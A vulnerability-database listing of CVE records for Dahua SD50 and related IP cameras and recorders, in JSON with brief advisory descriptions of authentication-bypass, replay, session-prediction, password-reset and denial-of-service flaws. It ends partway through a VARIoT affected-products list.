Vulnerabilites related to dahuasecurity - sd50
cve-2019-9682
Vulnerability from cvelistv5
Published
2020-05-13 15:10
Modified
2024-08-04 21:54
Severity ?
Summary
Dahua devices with Build time before December 2019 use strong security login mode by default, but in order to be compatible with the normal login of early devices, some devices retain the weak security login mode that users can control. If the user uses a weak security login method, an attacker can monitor the device network to intercept network packets to attack the device. So it is recommended that the user disable this login method.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-04T21:54:45.174Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.dahuasecurity.com/support/cybersecurity/details/767",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series,IPC-HDBW1320E-W",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "Versions which Build time before December,2019",
                  },
               ],
            },
         ],
         descriptions: [
            {
               lang: "en",
               value: "Dahua devices with Build time before December 2019 use strong security login mode by default, but in order to be compatible with the normal login of early devices, some devices retain the weak security login mode that users can control. If the user uses a weak security login method, an attacker can monitor the device network to intercept network packets to attack the device. So it is recommended that the user disable this login method.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Replay Attacks",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2020-05-13T15:10:43",
            orgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            shortName: "dahua",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.dahuasecurity.com/support/cybersecurity/details/767",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cybersecurity@dahuatech.com",
               ID: "CVE-2019-9682",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series,IPC-HDBW1320E-W",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Versions which Build time before December,2019",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Dahua devices with Build time before December 2019 use strong security login mode by default, but in order to be compatible with the normal login of early devices, some devices retain the weak security login mode that users can control. If the user uses a weak security login method, an attacker can monitor the device network to intercept network packets to attack the device. So it is recommended that the user disable this login method.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Replay Attacks",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://www.dahuasecurity.com/support/cybersecurity/details/767",
                     refsource: "MISC",
                     url: "https://www.dahuasecurity.com/support/cybersecurity/details/767",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
      assignerShortName: "dahua",
      cveId: "CVE-2019-9682",
      datePublished: "2020-05-13T15:10:43",
      dateReserved: "2019-03-11T00:00:00",
      dateUpdated: "2024-08-04T21:54:45.174Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2021-33044
Vulnerability from cvelistv5
Published
2021-09-15 21:36
Modified
2024-09-05 15:00
Severity ?
Summary
The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
Impacted products
Vendor Product Version
n/a Some Dahua IP Camera, Video Intercom, PTZ Dome Camera, Thermal Camera devices Version: Dahua IP Camera devices IPC-HX3XXX, IPC-HX5XXX, and IPC-HUM7XXX, Video Intercom devices VTO75X95X, VTO65XXX, and VTH542XH, PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, and SD6AL, Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, and TPC-PT8X21B devices Buildtime before June, 2021.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T23:42:19.261Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
               },
               {
                  name: "20211005 [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://seclists.org/fulldisclosure/2021/Oct/13",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        dateAdded: "2024-08-21",
                        reference: "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json",
                     },
                     type: "kev",
                  },
               },
               {
                  other: {
                     content: {
                        id: "CVE-2021-33044",
                        options: [
                           {
                              Exploitation: "active",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-09-05T14:59:48.366509Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-09-05T15:00:36.585Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Some Dahua IP Camera, Video Intercom, PTZ Dome Camera, Thermal Camera devices",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "Dahua IP Camera devices IPC-HX3XXX, IPC-HX5XXX, and IPC-HUM7XXX, Video Intercom devices VTO75X95X, VTO65XXX, and VTH542XH, PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, and SD6AL, Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, and TPC-PT8X21B devices Buildtime before June, 2021.",
                  },
               ],
            },
         ],
         descriptions: [
            {
               lang: "en",
               value: "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Improper Authentication",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2021-10-06T16:06:13",
            orgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            shortName: "dahua",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
            },
            {
               name: "20211005 [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://seclists.org/fulldisclosure/2021/Oct/13",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cybersecurity@dahuatech.com",
               ID: "CVE-2021-33044",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Some Dahua IP Camera, Video Intercom, PTZ Dome Camera, Thermal Camera devices",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Dahua IP Camera devices IPC-HX3XXX, IPC-HX5XXX, and IPC-HUM7XXX, Video Intercom devices VTO75X95X, VTO65XXX, and VTH542XH, PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, and SD6AL, Thermal TPC-BF1241, TPC-BF2221, TPC-SD2221, TPC-BF5XXX, TPC-SD8X21, and TPC-PT8X21B devices Buildtime before June, 2021.",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Improper Authentication",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
                     refsource: "MISC",
                     url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
                  },
                  {
                     name: "20211005 [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)",
                     refsource: "FULLDISC",
                     url: "http://seclists.org/fulldisclosure/2021/Oct/13",
                  },
                  {
                     name: "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html",
                     refsource: "MISC",
                     url: "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
      assignerShortName: "dahua",
      cveId: "CVE-2021-33044",
      datePublished: "2021-09-15T21:36:04",
      dateReserved: "2021-05-17T00:00:00",
      dateUpdated: "2024-09-05T15:00:36.585Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2020-9502
Vulnerability from cvelistv5
Published
2020-05-13 15:21
Modified
2024-08-04 10:34
Severity ?
Summary
Some Dahua products with Build time before December 2019 have Session ID predictable vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-04T10:34:38.156Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.dahuasecurity.com/support/cybersecurity/details/777",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series,IPC-HFW1431S",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "Versions which Build time before December,2019",
                  },
               ],
            },
         ],
         descriptions: [
            {
               lang: "en",
               value: "Some Dahua products with Build time before December 2019 have Session ID predictable vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Session hijacking",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2020-05-13T15:21:12",
            orgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            shortName: "dahua",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.dahuasecurity.com/support/cybersecurity/details/777",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cybersecurity@dahuatech.com",
               ID: "CVE-2020-9502",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series,IPC-HFW1431S",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Versions which Build time before December,2019",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Some Dahua products with Build time before December 2019 have Session ID predictable vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Session hijacking",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://www.dahuasecurity.com/support/cybersecurity/details/777",
                     refsource: "MISC",
                     url: "https://www.dahuasecurity.com/support/cybersecurity/details/777",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
      assignerShortName: "dahua",
      cveId: "CVE-2020-9502",
      datePublished: "2020-05-13T15:21:12",
      dateReserved: "2020-03-01T00:00:00",
      dateUpdated: "2024-08-04T10:34:38.156Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2021-33046
Vulnerability from cvelistv5
Published
2022-01-13 20:27
Modified
2024-08-03 23:42
Severity ?
Summary
Some Dahua products have access control vulnerability in the password reset process. Attackers can exploit this vulnerability through specific deployments to reset device passwords.
Impacted products
Vendor Product Version
n/a Access control vulnerability found in some Dahua products Version: Dahua IP Camera devices IPC-HX3XXX, and IPC-HX5XXX
Version: PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, and SD6AL
Version: Thermal TPC-BF1241,TPC-BF2221, TPC-SD2221
Version: VTO2101E, VTOX221E, and ASC2204C devices Buildtime between 2017/7 ~ 2021/7. NVR devices NVR4XXX, and NVR5XXX
Version: XVR devices XVR4XXX, and XVR5XXX
Version: HCVR devices HCVR7XXX, and HCVR8XXX devices Buildtime between 2017/1 ~ 2021/7.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T23:42:19.550Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "https://www.dahuasecurity.com/support/cybersecurity/details/987",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "https://support.dahuatech.com/networkSecurity/securityDetails?id=95",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "Access control vulnerability found in some Dahua products",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "Dahua IP Camera devices IPC-HX3XXX, and IPC-HX5XXX",
                  },
                  {
                     status: "affected",
                     version: "PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, and SD6AL",
                  },
                  {
                     status: "affected",
                     version: "Thermal TPC-BF1241,TPC-BF2221, TPC-SD2221",
                  },
                  {
                     status: "affected",
                     version: "VTO2101E, VTOX221E, and ASC2204C devices Buildtime between 2017/7 ~ 2021/7.  NVR devices NVR4XXX, and NVR5XXX",
                  },
                  {
                     status: "affected",
                     version: "XVR devices XVR4XXX, and XVR5XXX",
                  },
                  {
                     status: "affected",
                     version: "HCVR devices HCVR7XXX, and HCVR8XXX devices Buildtime between 2017/1 ~ 2021/7.",
                  },
               ],
            },
         ],
         descriptions: [
            {
               lang: "en",
               value: "Some Dahua products have access control vulnerability in the password reset process. Attackers can exploit this vulnerability through specific deployments to reset device passwords.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Access control",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-01-14T18:49:15",
            orgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            shortName: "dahua",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "https://www.dahuasecurity.com/support/cybersecurity/details/987",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "https://support.dahuatech.com/networkSecurity/securityDetails?id=95",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cybersecurity@dahuatech.com",
               ID: "CVE-2021-33046",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Access control vulnerability found in some Dahua products",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Dahua IP Camera devices IPC-HX3XXX, and IPC-HX5XXX",
                                       },
                                       {
                                          version_value: "PTZ Dome Camera SD1A1, SD22, SD49, SD50, SD52C, and SD6AL",
                                       },
                                       {
                                          version_value: "Thermal TPC-BF1241,TPC-BF2221, TPC-SD2221",
                                       },
                                       {
                                          version_value: "VTO2101E, VTOX221E, and ASC2204C devices Buildtime between 2017/7 ~ 2021/7.  NVR devices NVR4XXX, and NVR5XXX",
                                       },
                                       {
                                          version_value: "XVR devices XVR4XXX, and XVR5XXX",
                                       },
                                       {
                                          version_value: "HCVR devices HCVR7XXX, and HCVR8XXX devices Buildtime between 2017/1 ~ 2021/7.",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Some Dahua products have access control vulnerability in the password reset process. Attackers can exploit this vulnerability through specific deployments to reset device passwords.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Access control",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
                     refsource: "MISC",
                     url: "https://www.dahuasecurity.com/support/cybersecurity/details/957",
                  },
                  {
                     name: "https://www.dahuasecurity.com/support/cybersecurity/details/987",
                     refsource: "CONFIRM",
                     url: "https://www.dahuasecurity.com/support/cybersecurity/details/987",
                  },
                  {
                     name: "https://support.dahuatech.com/networkSecurity/securityDetails?id=95",
                     refsource: "CONFIRM",
                     url: "https://support.dahuatech.com/networkSecurity/securityDetails?id=95",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
      assignerShortName: "dahua",
      cveId: "CVE-2021-33046",
      datePublished: "2022-01-13T20:27:13",
      dateReserved: "2021-05-17T00:00:00",
      dateUpdated: "2024-08-03T23:42:19.550Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2020-9500
Vulnerability from cvelistv5
Published
2020-04-09 13:21
Modified
2024-08-04 10:34
Severity ?
Summary
Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-04T10:34:37.927Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "Versions which Build time before December,2019",
                  },
               ],
            },
         ],
         descriptions: [
            {
               lang: "en",
               value: "Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Denial of Service",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2020-04-09T13:21:01",
            orgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            shortName: "dahua",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cybersecurity@dahuatech.com",
               ID: "CVE-2020-9500",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Versions which Build time before December,2019",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Denial of Service",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
                     refsource: "MISC",
                     url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
      assignerShortName: "dahua",
      cveId: "CVE-2020-9500",
      datePublished: "2020-04-09T13:21:01",
      dateReserved: "2020-03-01T00:00:00",
      dateUpdated: "2024-08-04T10:34:37.927Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2020-9499
Vulnerability from cvelistv5
Published
2020-04-09 13:19
Modified
2024-08-04 10:34
Severity ?
Summary
Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down.
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-04T10:34:38.218Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "Versions which Build time before December,2019",
                  },
               ],
            },
         ],
         descriptions: [
            {
               lang: "en",
               value: "Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "Denial of Service",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2020-04-09T13:19:23",
            orgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            shortName: "dahua",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cybersecurity@dahuatech.com",
               ID: "CVE-2020-9499",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "IPC-HX2XXX Series,IPC-HXXX5X4X Series,IPC-HX5842H,IPC-HX7842H,NVR 5x Series,NVR 4x Series,SD6AL Series,SD5A Series,SD1A Series,PTZ1A Series,SD50/52C Series",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "Versions which Build time before December,2019",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "Denial of Service",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
                     refsource: "MISC",
                     url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
      assignerShortName: "dahua",
      cveId: "CVE-2020-9499",
      datePublished: "2020-04-09T13:19:23",
      dateReserved: "2020-03-01T00:00:00",
      dateUpdated: "2024-08-04T10:34:38.218Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

var-202004-1824
Vulnerability from variot

Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down. Dahua There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera.

There are security holes in many Dahua products

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202004-1824",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "ipc-hx7842h",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n42b3p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd1a",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n42b2p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52b3p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52b2p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52a4p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "sd50",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n52b5p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "ipc-hx5842h",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
            model: "n42b1p",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2019-12",
         },
         {
